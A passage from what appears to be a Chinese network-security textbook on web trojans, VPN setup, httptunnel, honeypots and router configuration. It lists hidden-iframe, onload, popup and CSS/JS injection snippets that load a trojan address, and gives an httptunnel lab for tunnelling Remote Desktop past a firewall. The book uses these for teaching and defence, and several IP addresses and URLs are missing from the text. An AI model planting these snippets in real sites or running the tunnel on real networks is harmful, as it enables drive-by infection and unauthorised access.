圖所示的被圈部分代碼。wwwroot中INDEX.HTM文件的代碼說明如表5.27/214所示。第8步：打開瀏覽器。在WindowsXP上，打開瀏覽器（IE或者Firefox），地址欄輸入。注意：圖中左上角的被圈部分，是index.htm中橢圓部分代碼的效果。第9步：編輯www_muma文件夾中的INDEX.HTM文件。在Windows2003上，編輯C:\Inetpub\www_muma\INDEX.HTM文件，插入如圖所示的被圈部分代碼。www_muma文件夾中INDEX.HTM文件的代碼說明見表5.28/215。第10步：打開IE瀏覽器。在WindowsXP上，打開IE瀏覽器，地址欄輸入，此時，網頁木馬已經在自己的電腦中創(chuàng)建了兩個文件。3．一些常用的掛馬方式（1）框架掛馬。<iframesrc="網馬地址"width=0height=0></iframe>（2）body掛馬。<bodyonload="window.location='網馬地址';"></body>（3）java掛馬。<scriptlanguage=javascript>window.open("網馬地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>（4）js文件掛馬。首先將代碼“document.write("<iframewidth=0height=0src='網馬地址'></iframe>");”保存為muma.js文件，則js文件掛馬代碼為“<scriptlanguage=javascriptsrc=muma.js></script>”。（5）css中掛馬。body{background-image:url('javascript:document.write("<scriptsrc=/muma.js></script>")')}（6）高級欺騙。<ahref=(迷惑連接地址)onMouseOver="muma();returntrue;">搜狐首頁</a><scriptlanguage=javascript>functionmuma(){open("網馬地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");}</script>5.13.2網頁病毒、網頁掛馬基本概念

1．網頁病毒網頁病毒是利用網頁來進行破壞的病毒，它存在于網頁之中，其實是使用一些腳本語言編寫的一些惡意代碼，利用瀏覽器漏洞來實現(xiàn)病毒的植入。2．網頁掛馬（網頁木馬）網頁掛馬是指黑客自己建立帶病毒的網站，或者入侵大流量網站，然后在其網頁中植入木馬和病毒，當用戶瀏覽到這些網頁時就會中毒。3．WSH（WindowsScriptingHost，Windows腳本宿主）WSH是內嵌于Windows操作系統(tǒng)中的腳本語言工作環(huán)境。WSH的優(yōu)點在于它能夠使人們可以充分利用腳本來實現(xiàn)計算機工作的自動化，缺點是許多計算機病毒制造者正在熱衷于用腳本語言來編制病毒，并利用WSH的支持功能，讓這些隱藏著病毒的腳本在網絡中廣為傳播。借助WSH的這一缺陷，通過JavaScript、VBScript、ActiveX等網頁腳本語言，就產生了大量的網頁病毒和網頁木馬。4．網頁木馬的基本工作流程（1）打開含有網頁木馬的網頁。（2）網頁木馬利用瀏覽器漏洞或者一些腳本功能下載一個可執(zhí)行文件或腳本。5．網頁木馬的種類（1）Flash動畫木馬。（2）圖片木馬。5.13.3病毒、蠕蟲和木馬的清除和預防1．遭受網頁病毒、網頁木馬攻擊后的癥狀（1）上網前系統(tǒng)一切正常，下網后系統(tǒng)就會出現(xiàn)異常情況。（2）默認主頁被更改，IE瀏覽器工具欄內的修改功能被屏蔽。（3）不定時彈出廣告。（4）電腦桌面及桌面上的圖標被隱藏。（5）在電腦桌面上無故出現(xiàn)陌生網站的鏈接。（6）登錄某個網站后，發(fā)現(xiàn)迅速打開一個窗口后又消失，并且在系統(tǒng)文件夾內多了幾個未知的、類似系統(tǒng)文件的新文件。（7）私有賬號無故丟失。（8）發(fā)現(xiàn)多了幾個未知的進程，而且刪不掉，重啟后又會出現(xiàn)。（9）CPU利用率一直很高。（10）注冊表編輯器被鎖定。2．清除病毒、蠕蟲和木馬的一般方法（1）使用殺毒軟件或者專殺工具查殺。（2）查看任務管理器，發(fā)現(xiàn)仿系統(tǒng)文件的進程要立刻禁止掉，然后到相應的路徑查看該文件的“創(chuàng)建時間”，如果和中毒時間相仿，那么就說明該文件極有可能是病毒文件。因為系統(tǒng)文件的創(chuàng)建時間比較早，大約要比當前時間早2～5年，按如此辦法就可以逐一的找出可疑的文件，然后將他們刪除，如果在Windows中不能刪除，那么要進入DOS進行刪除。（3）修改注冊表。網頁病毒通過注冊表具有再生的功能，所以要注意注冊表啟動項：[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices][HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce][HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run][HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce][HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run][HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce][HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]一般情況，上面的所有的鍵值都為空，如果不為空，應該全部清空。另外，也應注意關聯(lián)項目，正確的鍵值如下：[HKEY_CLASSES_ROOT\chm.file\shell\open\command"(默認)""hh.exe"%1][HKEY_CLASSES_ROOT\exefile\shell\open\command"(默認)""%1"%*][HKEY_CLASSES_ROOT\inifile\shell\open\command"(默認)"%SystemRoot%\System32\NOTEPAD.EXE%1][HKEY_CLASSES_ROOT\regfile\shell\open\command"(默認)"regedit.exe"%1"][HKEY_CLASSES_ROOT\scrfile\shell\open\command"(默認)""%1"/S][HKEY_CLASSES_ROOT\txtfile\shell\open\command"(默認)"%SystemRoot%\system32\NOTEPAD.EXE%1]（4）清理配置文件啟動項。關注autoexec.bat、win.ini和system.ini文件。autoexec.bat的內容為空；win.ini文件中[Windows]下面，“run=”和“l(fā)oad=”是可能加載木馬程序的途徑。一般情況下，等號后面什么都沒有；system.ini文件中[boot]下面有個“shell=文件名”。正確的文件名應該是“explorer.exe”，如果不是“explorer.exe”，而是“shell=explorer.exe程序名”，那么后面跟著的那個程序就是木馬程序，就是說你已經中木馬了。（5）清理緩存。由于病毒會停留在計算機的臨時文件夾與緩存目錄中，所以要清理C:\DocumentsandSettings\Administrator（或其他用戶名）\LocalSettings文件夾中Temp和TemporaryInternetFiles子文件夾里的內容。（6）檢查啟動組。開始程序啟動中是否有奇怪的啟動文件，現(xiàn)在的木馬大多不再通過啟動菜單進行隨機啟動，但是也不可掉以輕心。如果發(fā)現(xiàn)在“開始/程序/啟動”中有新增的項，就要多加小心。（7）通過文件對比查找木馬。（8）清除木馬。清除木馬的一般過程是：首先確認木馬進程，然后停止該進程，再在注冊表里清理相關表項，最后刪除硬盤上木馬文件。（9）查看可疑端口。端口掃描是檢查遠程機器有無木馬的最好辦法，查看連接和端口掃描的原理基本相同，不過是在本地機上的命令行窗口中執(zhí)行“netstat–a”命令來查看所有的TCP/UDP連接。查看端口與進程關系的小程序有ActivePorts和Tcpview等。（10）在安全模式或純DOS模式下清除病毒。對于現(xiàn)在大多數(shù)流行的蠕蟲病毒、木馬程序和網頁代碼病毒等，可以在安全模式下徹底清除，然而對于一些引導區(qū)病毒和感染可執(zhí)行文件的病毒則需要在純DOS下殺毒。3．預防網頁病毒、網頁木馬（1）安裝殺毒軟件，打開實時監(jiān)控。（2）經常升級殺毒軟件的病毒庫。（3）安裝防火墻。（4）經常更新系統(tǒng)，安裝安全補丁。（5）不要輕易訪問具有誘惑性的網站。（6）在IE中全部禁止ActiveX插件和控件、Java腳本。（7）打開IE屬性對話框中選擇“安全”選項卡，單擊“受限站點”，將“安全級別”設置為“高”，單擊“站點”按鈕，添加要阻止的危險網址。（8）卸載ActiveXObject。在命令提示符下執(zhí)行“regsvr32.exeshell32.dll/u/s”命令，卸載Shell.application控件。如果以后要使用這個控件，在命令提示符下執(zhí)行“regsvr32.exeshell32.dll/i/s”命令重新安裝Shell.application控件。其中，“regsvr32.exe”是注冊或反注冊OLE對象或控件的命令，“/u”是反注冊參數(shù)，“/s”是安靜模式參數(shù)，“/i”是安裝參數(shù)。（9）定時備份。定時備份硬盤上的重要文件，可以用ghost備份分區(qū)，可以用diskgen備份分區(qū)表。（10）不要運行來路不明的軟件，不要打開來路不明的郵件。5.13.4流行殺毒軟件簡介國內市場上單機版殺毒軟件的主流產品分別是：《金山毒霸》、《瑞星殺毒軟件》、《江民殺毒軟件KV》、《卡巴斯基殺毒軟件》、《NortonAntiVirus》、《360殺毒軟件》。5.14.1VPN技術概述1．虛擬專用網（VirtualPrivateNetwork，VPN）的定義VPN就是通過一個公用網絡（公用網絡包括IP網絡、幀中繼網絡和ATM網絡，通常是指互聯(lián)網）建立一個臨時的、安全的連接，是一條穿過公用網絡的安全、穩(wěn)定的通道。VPN不是真的專用網絡，但卻能夠實現(xiàn)專用網絡的功能。一般情況下VPN有PPTPVPN、IPSECVPN和L2TPVPN3種，其中PPTPVPN最簡便，IPSECVPN最通用，各個平臺都支持，L2TPVPN最安全。2．VPN的基本功能VPN的功能至少要包含以下幾個方面。（1）加密數(shù)據：保證通過公用網絡傳輸?shù)男畔⒓词贡黄渌私孬@也不會泄露。（2）信息驗證和身份識別：保證信息的完整性、合理性，并能鑒別用戶的身份。（3）提供訪問控制：不同的用戶有不同的訪問權限。（4）地址管理：能夠為用戶分配專用網絡上的地址并確保地址的安全性。（5）密鑰管理：能夠生成并更新客戶端和服務器的加密密鑰。（6）多協(xié)議支持：能夠支持公共網絡上普遍使用的基本協(xié)議（包括IP、IPX等）。3．VPN的優(yōu)點（1）降低費用：遠程用戶可以在當?shù)亟尤隝nternet，以Internet作為通道與企業(yè)內部的專用網絡相連，可以大幅降低通信費用，另外企業(yè)可以節(jié)省購買和維護通信設備的費用。（2）安全性增強：VPN使用通道協(xié)議、身份驗證和數(shù)據加密3個方面的技術保證通信的安全性。（3）支持最常用的網絡協(xié)議：在基于IP、IPX和NetBUI協(xié)議的網絡中的客戶機都能夠很容易的使用VPN。（4）有利于IP地址安全：VPN是加密的，VPN數(shù)據在Internet中傳輸時，Internet上的用戶只看到公共的IP地址，看不到數(shù)據包內包含的專用網絡地址。5.14.2實例—配置基于Windows平臺的VPN1．在Windows2003ServerSP2上配置VPN服務器的過程第1步：打開“路由和遠程訪問服務器安裝向導”窗口。進入“開始”→“程序”→“管理工具”→“路由和遠程訪問”。右鍵單擊左邊框架中的“ZTG2003（本地）”（ZTG2003為服務器名），選擇“配置并啟用路由和遠程訪問”。禁用防火墻和互聯(lián)網連接共享：開始|程序|管理工具|服務|whidows/internetconnectionshare(ICS)|禁用第2步：選擇網絡接口。選擇“遠程訪問（撥號或VPN）”，然后單擊“下一步”按鈕，選擇“VPN”，然后單擊“下一步”按鈕，選擇網絡接口（本實驗選擇），然后單擊“下一步”按鈕。第3步：指定IP地址。要為遠程VPN客戶端指定IP地址。默認選項為“自動”，由于本機沒有配置DHCP服務器，因此需要改選為“來自一個指定的地址范圍”，然后單擊“下一步”按鈕。在“新建地址范圍”窗口中，可以為VPN客戶機指定所分配的IP地址范圍。比如分配的IP地址范圍為“00”～“00”，此時需注意，不可以將本身的IP地址（）包含進去。然后單擊“確定”按鈕。注意：這些IP地址將分配給VPN服務器和VPN客戶機。為了確保連接后的VPN網絡能同VPN服務器原有局域網正常通信，他們必須同VPN服務器的IP地址處在同一個網段中。即假設VPN服務器IP地址為“”，則此范圍中的IP地址均應該以“192.168.0”開頭。單擊“確定”按鈕，然后單擊“下一步”按鈕繼續(xù)。第4步：結束VPN服務器的配置。在“管理多個遠程訪問服務器”一步用于設置集中管理多個VPN服務器。默認選項為“否，使用路由和遠程訪問來對連接請求進行身份驗證”，不用修改，直接單擊“下一步”按鈕，直接單擊“完成”按鈕。結束了VPN服務器的配置工作。說明：此時“路由和遠程訪問”控制臺中的“路由和遠程訪問”服務已經處于“已啟動”狀態(tài)了；而在“網絡和撥號連接”窗口中也會多出一個“傳入的連接”圖標。第5步：賦予用戶撥入權限。默認情況下，包括Administrator用戶在內的所有用戶均被拒絕撥入到VPN服務器上，因此需要為相應用戶賦予撥入權限。下面以“Administrator”用戶為例。（1）在“我的電腦”處單擊右鍵，選“管理”打開“計算機管理”控制臺。（2）在左邊框架中依次展開“本地用戶和組”→“用戶”，在右邊框架中雙擊“Administrator”。（3）轉到“撥入”選項卡，在“選擇訪問權限（撥入或VPN）”選項組下默認選項為“通過遠程訪問策略控制訪問”，改選為“允許訪問”，然后單擊“確定”按鈕返回“計算機管理”控制臺，即結束了賦予“Administrator”用戶撥入權限的工作。2．VPN客戶機（WinXP）的配置過程第1步：打開“網絡連接”窗口。在“網上鄰居”處單擊右鍵，選“屬性”打開“網絡連接”窗口，單擊“創(chuàng)建一個新的連接”，在彈出的窗口中單擊“下一步”按鈕，選擇“連接到我的工作場所的網絡”，單擊“下一步”按鈕，選擇“虛擬專用網絡連接”，單擊“下一步”按鈕。第2步：輸入公司名。輸入公司名，單擊“下一步”按鈕，在“公用網絡”一步可以選擇是否在VPN連接前自動撥號。默認選項為“自動撥此初始連接”，需要改選為“不撥初始連接”，然后單擊“下一步”按鈕。第3步：輸入VPN服務器的IP地址。需要提供VPN服務器的主機名或IP地址。在文本框中輸入VPN服務器的IP地址，本實驗VPN服務器IP地址是，然后單擊“下一步”按鈕，可以勾選“在我的桌面添加一快捷方式”復選框，然后單擊“完成”按鈕。之后會自動彈出“連接win2003”對話框。輸入用戶名和密碼，根據需要勾選“我下面用戶保存用戶名和密碼”復選框，然后單擊“連接”按鈕。注意：此處輸入的用戶名應為VPN服務器上已經建立好，并設置了具有撥入服務器權限的用戶，密碼也為其密碼。連接成功之后可以看到，雙方的任務欄右側均會出現(xiàn)兩個撥號網絡成功運行的圖標，其中一個是到Intenet的連接，另一個則是VPN的連接了。注意：當雙方建立好了通過Internet的VPN連接后，即相當于又在Internet上建立好了一個雙方專用的虛擬通道，而通過此通道，雙方可以在網上鄰居中進行互訪，即相當于又組成了一個局域網絡，這個網絡是雙方專用的，而且具有良好的保密性能。VPN建立成功之后，雙方便可以通過IP地址或“網上鄰居”來達到互訪的目的，當然也就可以使用對方所共享出來的軟硬件資源了。當VPN網絡建立成功之后，VPN客戶機和VPN服務器，或者VPN客戶機和VPN服務器所在的局域網中的其他電腦，進行共享資源的互訪的方法是，在資源管理器窗口的地址欄輸入“\\對方IP地址”來訪問對方共享出的軟硬件資源。如果VPN客戶機不能訪問互聯(lián)網，是因為VPN客戶機使用了VPN服務器定義的網關，解決方法是禁止VPN客戶機使用VPN服務器上的默認網關。具體操作方法：對于WindowsXP客戶機，在“網絡和撥號連接”窗口中，先選中相應的連接名，比如為“win2003”，單擊右鍵，選“屬性”打開“win2003屬性”窗口。再轉到“網絡”選項卡，雙擊列表中的“Internet協(xié)議（TCP/IP）”打開“Internet協(xié)議（TCP/IP）屬性”窗口。然后單擊“高級”按鈕進入“高級TCP/IP設置”窗口的“常規(guī)”選項卡，去掉“在遠程網絡上使用默認網關”前的小勾即可。5.15實例—httptunnel技術

1．httptunnel技術httptunnel技術也稱為隧道技術，是一種繞過防火墻端口屏蔽的通信方式。httptunnel原理：在防火墻兩邊的主機上都有一個轉換程序，將原來需要發(fā)送或接受的數(shù)據包封裝成HTTP請求的格式騙過防火墻，當被封裝的數(shù)據包穿過防火墻到達對方時，再由轉換程序將數(shù)據包還原，然后將還原的數(shù)據包交給相應的服務程序。由此可知，攻擊者可以利用這種技術實現(xiàn)遠程控制。httptunnel的官方網站是。2．實例—通過httptunnel技術進行入侵

實驗環(huán)境準備：1.win2003啟動遠程桌面鼠右我的電腦，選屬性，再選遠程2.win2003啟動telnet服務、計算機名<15個字符；tlntsvr/servies第1步：下載并安裝httptunnel程序。在/files/httptunnel-3.3w32.zip下載httptunnel程序，其中包含3個文件：htc.exe（httptunnelclient，也就是客戶端）、hts.exe（httptunnelserver，也就是服務器端）和cygwin1.dll（一個動態(tài)鏈接庫）。hts.exe是服務器端，安裝被入侵電腦中，htc.exe是客戶端，安裝在入侵者電腦中。第2步：在win2003中啟動服務器端程序。將hts.exe復制到C:\DocumentsandSettings\Administrator目錄下面。將cygwin1.dll復制到C:\WINDOWS\system32目錄下面。如果本臺電腦的IIS已經啟動，則先將其關閉。開始－程序－管理工具－服務－IIS。在命令提示符窗口中執(zhí)行hts-Flocalhost:338980命令，該命令的含義是本機3389端口發(fā)出去的數(shù)據全部通過80端口中轉一下，80為hts監(jiān)聽的端口，3389是入侵者要連接的端口。然后執(zhí)行netstat-an命令，發(fā)現(xiàn)80端口已經處于監(jiān)聽狀態(tài)。第3步：在winxp中執(zhí)行客戶端程序。將htc.exe復制到C:\DocumentsandSettings\Administrator目錄下面。將cygwin1.dll復制到C:\WINDOWS\system32目錄下面。入侵者在自己的電腦中執(zhí)行htc-F6789:80。其中htc是客戶端程序，參數(shù)-F表示將來自本機6789端口的數(shù)據全部轉發(fā)到:80，這個端口（6789）可以隨便選，只要本機目前沒有使用即可。然后netstat-an命令，發(fā)現(xiàn)6789端口已經處于監(jiān)聽狀態(tài)。注意：該CMD窗口在后續(xù)實驗過程中不要關閉。第4步：打開“遠程桌面連接”對話框。入侵者(winxp)在自己的電腦中，單擊“開始”→“運行”命令，輸入mstsc命令，打開“遠程桌面連接”對話框，輸入:6789，單擊“連接”按鈕，如果不出意外，將出現(xiàn)如圖5.128所示的登錄窗口，此時表明成功地穿越了防火墻。5.16實例：蜜罐技術蜜罐就是一臺不作任何安全防范措施，并且連接互聯(lián)網的計算機。蜜罐與一般的計算機不同，它存在多種漏洞，并且管理員清楚這些漏洞，內部運行各種數(shù)據記錄程序，會記錄入侵者的所有操作和行為。蜜罐是一種資源，它的價值是被攻擊或攻陷。蜜罐是一種主動防御技術。3．一個簡單蜜罐的例子操作系統(tǒng)為：RHEL/CentOS/Fedora。黑客入侵Linux系統(tǒng)一般有兩種方法：第一、猜測root口令，一旦獲得root口令，就會以root身份登錄。第二、先以普通用戶身份登錄，然后用su命令轉換成root。（1）設置陷阱，防止黑客以root身份登錄。在/root/.bash_profile文件后面追加如下一段程序：#fileclearecho"Loginincorrect"echoecho"Login:"readpif["$p"="123456"];then clearelse exitfi（2）設置陷阱，防止黑客用su命令轉換成root。在/etc/profile文件后面追加如下一條命令：aliassu='suztguang'（3）設置陷阱，中止黑客的root身份。如果黑客已經成功以root身份登錄，就要啟動登錄成功的陷阱。一旦root登錄，就啟動一個計時器，正常的root登錄能夠停止計時，而非法入侵者因不知道何處有計時器，就無法停止計時，等計時到時，就觸發(fā)相應的操作（如關機等）。陷阱程序/root/nonhacker.sh內容如下：#!/bin/shtt=0while["$tt"-le120];do sleep1 tt=$(($tt+1))donehalt #2分鐘后關機在/root/.bashrc文件后面追加如下一條命令：.nonhacker.sh&正常root用戶登錄后，可以執(zhí)行jobs命令，然后執(zhí)行kill%n命令終止陷阱程序。5.17實例：無線網絡安全配置實例：無線網絡安全配置

實驗環(huán)境

第1步：右鍵單擊【網上鄰居】，選擇【屬性】，然后右鍵單擊【本地連接】，選擇【屬性】，然后在【常規(guī)】選項卡里雙擊【Internet協(xié)議（TCP/IP）】，設置靜態(tài)IP地址2。第2步：打開IE瀏覽器，在地址欄中輸入，按回車鍵。在彈出的對話框中輸入用戶名和密碼，默認的用戶名和密碼都是admin。單擊【確定】按鈕，出現(xiàn)路由器的界面，選擇【設置向導】，勾選【PPPoE】,單擊【下一步】按鈕。第3步：輸入ADSL上網賬號和密碼（安裝寬帶時，工作人員給的賬號和密碼）。單擊【下一步】按鈕.第4步：更改SSID號為“ZTG-WLAN”。在模式欄選擇自己的無線網卡模式（如802.11b、802.11g等，根據自己的情況而定）?，F(xiàn)在的路由器兼容802.11b、802.11g。單擊【下一步】按鈕。

注意：如